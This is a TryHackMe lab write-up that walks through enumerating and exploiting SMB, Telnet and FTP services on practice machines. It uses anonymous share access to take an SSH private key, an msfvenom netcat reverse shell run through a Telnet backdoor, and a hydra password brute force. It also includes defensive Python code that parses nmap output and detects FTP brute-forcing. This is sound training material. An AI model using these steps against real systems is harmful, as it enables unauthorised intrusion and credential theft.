TryHackMe: Network Services Room Writeup

sy is typing
Nov 20, 2020 · 10 min read

The room: Learn about, then enumerate and exploit a variety of network services and misconfigurations. https://tryhackme.com/room/networkservices

Task 2: Understanding SMB

All the answers are found in the task description.

What does SMB stand for?

server message block

What type of protocol is SMB?

response-request

What do clients connect to servers using?

tcp/ip

What systems does Samba run on?

unix

Task 3: Enumerating SMB

From this task on is where the fun starts! First, let's set up an environment variable to make the following commands easier.

export ip=10.10.0.0 # change it to your target machine's ip

Conduct an nmap scan of your choosing. How many ports are open?

Let’s run an nmap scan. As a reminder, these are what the flags mean:

  • -sV: service/version scan
  • --script vuln: run the NSE scripts in the vuln category
  • -oN: write the normal (human-readable) output to the given file

nmap -sV --script vuln -oN nmap-$ip.out $ip

Now to check for open ports from the scan results.

cat nmap-$ip.out | grep open

I spy with my little eye.. 3 open ports

3

What ports is SMB running on?

From the same output above, we can see the two Samba services.

139/445
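Rather than eyeballing grep output for the "how many ports are open" and "which ports is SMB on" questions, the -oN file can be parsed. The following is an added Python example, not code from the post or the room; it runs against a constructed scan file modelled on this target (banners are illustrative), and keys on the exact state "open", which a plain grep for "open" does not (it also matches "open|filtered").

```python
import re

# Constructed sample in nmap "normal output" (-oN) format, modelled on the room's
# SMB target; banners are illustrative, not captured from a real host.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated as: nmap -sV -oN nmap-10.10.0.0.out 10.10.0.0
Nmap scan report for 10.10.0.0
Host is up (0.045s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8012/tcp filtered unknown
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# port/proto, state, service and the optional version column of one port line
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")

def parse_nmap_normal(text):
    """Return one dict per port line; headers, notes and blank lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            entries.append({"port": int(port), "proto": proto, "state": state,
                            "service": service, "version": version or ""})
    return entries

def open_ports(entries, proto="tcp"):
    """Ports whose state is exactly 'open'; 'open|filtered' and 'filtered'
    results are not confirmed open and are left out."""
    return sorted(e["port"] for e in entries if e["proto"] == proto and e["state"] == "open")

def services_on(entries, ports):
    """Map each requested open port to its (service, version banner) pair."""
    return {e["port"]: (e["service"], e["version"]) for e in entries
            if e["port"] in ports and e["state"] == "open"}
```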

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

There seems to be no man page for enum4linux, but we can run enum4linux -h to see the flags.

The -a option does all the simple enumeration (and for some reason the task description lists it as -A).

So let’s run a -a scan. There’s no flag to write to file, so let’s use tee to do that. This will take about 1 min to run.

enum4linux -a $ip | tee enum4linux-$ip.out

Once the output reaches the end, or the line below, we can cancel the process with Ctrl-C:

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

Now let’s leisurely read the output to find the answers.

less enum4linux-$ip.out

The workgroup name is under the section “Enumerating Workgroup/Domain…”

workgroup

What comes up as the name of the machine?

The hint says to look under OS information; there aren’t really any labels, so it’s easy to miss.

polosmb

What operating system version is running?

This is in the same place as the machine name; this time it’s labelled!

6.1

What share sticks out as something we might want to investigate?

Let’s look further down at the “Share Enumeration…” section. Here is a list of share names.

I was actually more interested in the netlogon share, but oh wells..

profiles

Task 4: Exploiting SMB

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?

The format is given in the task description. The tricky part is the port. Since we want to use the default port, the -p flag is not needed.

smbclient //10.10.10.2/secret -U suit

Does the share allow anonymous access? Y/N?

This directly follows the example syntax above; we just need to substitute different values. Those values are given in the task description (remember we’re interested in the profiles share), so let’s run this:

smbclient //$ip/profiles -U Anonymous

A password prompt will appear, but the task description tells us not to supply a password, so just hit Enter.

y

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

Now that we’re in the smb console, we have only limited commands. Type help to see what they are. We’re looking for interesting documents, so let’s ls.

Actually everything looks interesting to me..

Let’s check out the only non-hidden document with more.

more "Working From Home Information.txt"

Such a nice company to work for..

john cactus

What service has been configured to allow him to work from home?

We can glean this from the file we were just snooping on.

ssh

Okay! Now we know this, what directory on the share should we look in?

ssh is associated with an .ssh folder, so that’s our next destination.

.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

cd .ssh
ls

The standard key-pair is present. id_rsa is the private key, id_rsa.pub is the public key. The most useful is definitely the private key.

id_rsa

What is the smb.txt flag?

The smb.txt file is on the main server. We’re going to have to access that now. We’ll grab John’s keys and use them to ssh into the main server.

Let’s download both keys to our machine!

mget id_rsa*

Next, open another terminal window and copy both keys into our machine’s ~/.ssh directory (create it with mkdir if it’s not present). Then change the permissions on the private key, since ssh refuses to use a private key that is readable by other users.

chmod 600 id_rsa

Now we can attempt to ssh into the main server! Before that, check the id_rsa.pub file to find the username at the end of the file.

ssh cactus@$ip

Quick troubleshooting:

  • Load key "/home/kali/.ssh/id_rsa": bad permissions: revisit the chmod step

Task 5: Understanding Telnet

All the answers are found in the task description.

What is Telnet?

application protocol

What has slowly replaced Telnet?

ssh

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

telnet 10.10.10.3 23

The lack of what means that all Telnet communication is in plaintext?

encryption

Task 6: Enumerating Telnet

Set the env var again since the machine changed, then run the scan! This will take a while to run.

export ip=10.10.0.0 # change it to your target machine's ip
nmap -A -oN nmap-$ip.out -p- $ip

How many ports are open on the target machine?

We can get the information for the next few questions by searching the scan output for open:

cat nmap-$ip.out | grep open

1

What port is this?

8012

This port is unassigned, but still lists the protocol it’s using, what protocol is this?

tcp

Now re-run the nmap scan, without the -p- flag. How many ports show up as open?

Run the scan again without -p-, writing the output to another file, then search for open again. Nothing will be returned, because 8012 is outside the default top-1000 port range.

nmap -A -oN nmap-$ip-2.out $ip
cat nmap-$ip-2.out | grep open

0

Based on the title returned to us, what do we think this port could be used for?

Looking back at the original scan results, we can find a line that tells us the answer to the next few questions.

a backdoor

Who could it belong to? Gathering possible usernames is an important step in enumeration.

skidy

Task 7: Exploiting Telnet

Great! It’s an open telnet connection! What welcome message do we receive?

Our next step is to try opening a telnet connection. Install the client if it’s not present. The port used here is non-standard; we saw it (8012) earlier while scanning the machine. Once we get in, we’ll see a welcome message.

sudo apt install telnet
telnet $ip 8012

At least they were honest..

SKIDY’S BACKDOOR.

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

Based on the welcome message, we know to use .HELP to check for available commands.

Then, try a .RUN. There is no return value or acknowledgement.

n

Now, use the command “ping [local tun0 ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

In another terminal session, run ifconfig and check for our local IP under tun0. For convenience, save it to an environment variable.

ifconfig
export lhost=10.9.0.0 # change it to your machine's ip

In the same terminal, run tcpdump according to the task description.

sudo tcpdump ip proto \icmp -i tun0

Then back to the telnet session, run a ping to your machine, following the task description.

.RUN ping 10.9.0.0 -c 1 # replace with your machine's ip

Check the terminal session running tcpdump. There should be two captured packets (the echo request and its reply); this means the ping from the target machine to our machine succeeded, and implies we are able to execute system commands.

y

We’re going to generate a reverse shell payload using msfvenom. What word does the generated payload start with?

We don’t need tcpdump anymore, so kill it. Let’s set the lport env var for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.

export lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R

The last line is the payload. It’s basically a command that starts with mkfifo and uses netcat.

mkfifo

What would the command look like for the listening port we selected in our payload?

The syntax is in the task description. These are what the flags mean:

  • -l: listen mode, for inbound connects
  • -v: verbose
  • -p: the local port to listen on

nc -lvp 4444

Success! What are the contents of flag.txt?

First, run the netcat command to listen on our lport.

nc -lvp $lport

Then in the telnet session, run the payload generated by msfvenom earlier (basically copy/paste entire last line into the telnet session).

Once the payload is run, the netcat session from earlier will respond. We now have a reverse shell to the target! We can use this netcat session to send commands to the target machine. Run ls to get a list of files, we will see flag.txt. Print out the contents and we’re done here!

Task 8: Understanding FTP

Most of the answers are found in the task description.

What communications model does FTP use?

We can find this info in the task description.

client-server

What’s the standard FTP port?

We can find this by googling around.

21

How many modes of FTP connection are there?

Active mode and passive mode.

2

Task 9: Enumerating FTP

How many ports are open on the target machine?

Let’s do our usual scan on this machine, this will take a while.

export ip=10.10.0.0 # change it to your target machine's ip 
nmap -sV -oN nmap-$ip.out $ip
cat nmap-$ip.out | grep open

2

What port is ftp running on?

21

What variant of FTP is running on it?

vsftpd

What is the name of the file in the anonymous FTP directory?

Log in following the instructions from the task description. We can use help to view the available commands, then ls to list the files.

PUBLIC_NOTICE.txt

What do we think a possible username could be?

Let’s snoop on the notice!

get PUBLIC_NOTICE.txt -

mike

Task 10: Exploiting FTP

What is the password for the user “mike”?

Say bye to ftp for now, then run the command from the task description with our user.

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV $ip ftp

Mike should’ve tried just a bit harder

password
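On the server side, a run like the one above leaves a very visible footprint in vsftpd.log: a burst of FAIL LOGIN lines for one user from one client, followed by an OK LOGIN. The following is an added Python example, not code from the post or the room, that parses vsftpd's login events and raises an alert when a client crosses a failure threshold inside a sliding window, and again if that same client then logs in successfully; the log excerpt is constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed vsftpd.log excerpt: a fast burst of failures for "mike" from one
# client, then a success, is the server-side footprint of a run like the one above.
SAMPLE_VSFTPD_LOG = """\
Fri Nov 20 10:00:01 2020 [pid 1200] [mike] FAIL LOGIN: Client "10.9.0.0"
Fri Nov 20 10:00:01 2020 [pid 1200] [mike] FAIL LOGIN: Client "10.9.0.0"
Fri Nov 20 10:00:02 2020 [pid 1200] [mike] FAIL LOGIN: Client "10.9.0.0"
Fri Nov 20 10:00:02 2020 [pid 1200] [mike] FAIL LOGIN: Client "10.9.0.0"
Fri Nov 20 10:00:03 2020 [pid 1200] [mike] FAIL LOGIN: Client "10.9.0.0"
Fri Nov 20 10:00:03 2020 [pid 1200] [mike] OK LOGIN: Client "10.9.0.0"
Fri Nov 20 10:05:00 2020 [pid 1300] [mike] FAIL LOGIN: Client "10.10.5.5"
Fri Nov 20 10:15:00 2020 [pid 1301] [mike] OK LOGIN: Client "10.10.5.5"
"""

# One vsftpd login-event line: timestamp, pid, optional [user], event, client IP.
LOG_RE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
                    r'(?:\[(?P<user>[^\]]*)\] )?(?P<event>FAIL LOGIN|OK LOGIN): Client "(?P<ip>[^"]+)"')

def parse_vsftpd_log(text):
    """Return login events as dicts; CONNECT and transfer lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append({"ts": datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"),
                           "user": m["user"], "event": m["event"], "ip": m["ip"]})
    return events

def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Alert once per client reaching `threshold` FAIL LOGINs within `window`,
    and again if that client later logs in successfully (password likely guessed)."""
    fails, flagged, alerts = defaultdict(list), set(), []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ip = ev["ip"]
        if ev["event"] == "FAIL LOGIN":
            # keep only failures still inside the sliding window, then add this one
            fails[ip] = [t for t in fails[ip] if ev["ts"] - t <= window] + [ev["ts"]]
            if len(fails[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "bruteforce", "ip": ip, "user": ev["user"],
                               "failures": len(fails[ip]), "at": ev["ts"]})
        elif ip in flagged:  # OK LOGIN from a client that was already flagged
            alerts.append({"type": "success-after-bruteforce", "ip": ip,
                           "user": ev["user"], "at": ev["ts"]})
    return alerts
```

The single failure from 10.10.5.5 stays below the threshold and produces nothing, so a normal mistyped password does not page anyone.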

What is ftp.txt?

Now that we’ve got Mike’s password, let’s repeat the steps and try to get to the file.

ftp $ip
mike
password
ls
get ftp.txt -
